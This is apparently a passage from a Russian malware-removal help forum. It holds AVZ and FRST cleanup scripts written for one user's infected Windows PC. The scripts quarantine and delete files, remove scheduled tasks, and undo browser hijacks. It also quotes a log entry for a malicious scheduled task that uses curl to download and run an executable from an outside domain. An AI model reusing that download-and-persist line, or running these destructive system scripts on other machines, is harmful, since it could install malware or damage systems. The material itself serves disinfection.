Смотрите видео ниже, чтобы узнать, как установить наш сайт в качестве веб-приложения на домашнем экране.
Примечание: Эта возможность может быть недоступна в некоторых браузерах.
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
QuarantineFileF('c:\users\игорь\appdata\roaming\curl', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 ,0);
QuarantineFile('C:\Users\Игорь\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\Игорь\AppData\Roaming\curl\curl_7_54.exe', '');
ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
DeleteFile('C:\Users\Игорь\AppData\Roaming\curl\curl.exe', '32');
DeleteFile('C:\Users\Игорь\AppData\Roaming\curl\curl_7_54.exe', '32');
DeleteFileMask('c:\users\игорь\appdata\roaming\curl', '*', true);
DeleteDirectory('c:\users\игорь\appdata\roaming\curl');
RegKeyParamWrite('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\Eventlog\System\ip100Avista', 'EventMessageFile', 'REG_EXPAND_SZ', '%SystemRoot%\System32\netevent.dll');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
RebootWindows(true);
end.
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
O22 - Task: curl - C:\Users\Игорь\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Игорь\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task: curls - C:\Users\Игорь\AppData\Roaming\curl\curl.exe (file missing)
Это после скрипта или общее дополнение?Забыл добавить, что автоматически открываются ссылки в Google Chrome такие:
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\Windows\msime.exe','');
DeleteFile('C:\Windows\msime.exe','32');
BC_Activate;
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
ставили самостоятельно?WinSpyAdd 1.34
Start::
CreateRestorePoint:
GroupPolicy: Restriction <==== ATTENTION
GroupPolicy\User: Restriction <==== ATTENTION
SearchScopes: HKU\S-1-5-21-3806154696-3261810818-1689236059-1000 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B8A5DABA5-BD92-4FD7-92EA-8C4798E8DAED%7D&gp=834428
SearchScopes: HKU\S-1-5-21-3806154696-3261810818-1689236059-1000 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B8A5DABA5-BD92-4FD7-92EA-8C4798E8DAED%7D&gp=834428
FF Homepage: Mozilla\Firefox\Profiles\7yqqk1js.default -> hxxps://mail.ru/cnt/11956636?fr=ffhp1.0.3&gp=800000
FF Extension: (No Name) - C:\Users\Игорь\AppData\Roaming\Mozilla\Firefox\Profiles\7yqqk1js.default\Extensions\28a8-60e6-1bc2-507b [2017-05-17]
FF Extension: (No Name) - C:\Users\Игорь\AppData\Roaming\Mozilla\Firefox\Profiles\7yqqk1js.default\Extensions\mefhakmgclhhfbdadeojlkbllmecialg@chrome-store-foxified-1132576233 [2018-02-17] [not signed]
Task: {68D26734-30DA-4098-B51D-B23BF9052A1A} - \MSI -> No File <==== ATTENTION
EmptyTemp:
Reboot:
End::